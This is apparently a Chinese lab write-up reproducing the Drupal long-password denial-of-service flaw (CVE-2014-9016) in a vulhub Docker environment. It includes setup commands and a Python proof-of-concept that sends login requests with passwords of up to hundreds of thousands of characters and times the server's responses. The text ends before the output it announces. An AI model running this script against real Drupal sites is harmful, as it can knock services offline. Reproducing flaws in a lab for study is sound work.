Drupal长密码拒绝服务漏洞复现（CVE-2014-9016），python编写POC

使用vulhub，进入CVE-2014-3704文件夹启动环境：

[root@www /]# cd /home/vulhub-master/drupal/CVE-2014-3704/
[root@www CVE-2014-3704]# docker-compose up -d

[root@www CVE-2014-3704]# docker ps
ConTAINER ID   IMAGE                      COMMAND                  CREATED         STATUS          PORTS                                                                                  NAMES
d51829db19cc   vulhub/drupal:7.31         "docker-php-entrypoi…"   4 minutes ago   Up 11 seconds   0.0.0.0:8080->80/tcp, :::8080->80/tcp                                                  cve-2014-3704_web_1

环境启动后，访问http://your-ip:8080即可看到Drupal的安装页面，使用默认配置安装即可。

其中，Mysql数据库名填写drupal，数据库用户名、密码为root，地址为mysql：

正常登录，使用Burp Suite抓包：

import requests

url = "http://192.168.33.170:8080/?q=node&destination=node"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Referer": "http://192.168.33.170:8080/?q=node&destination=node", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://192.168.33.170:8080", "Connection": "close", "Upgrade-Insecure-Requests": "1"}

for i in [1,1000,1,5000,1,10000,1,20000,1,30000]:
    passwd = "abcde12345" * i * 10000
    data = {"name": "abc", "pass": f"{passwd}",}
    r = requests.post(url, headers=headers,  data=data,timeout=999)
    print(f"密码长度：{i} 十万")
    print("响应时间：",r.elapsed.total_seconds())
    print("-"*20)
#短密码响应时间证明网络正常

pycharm运行结果：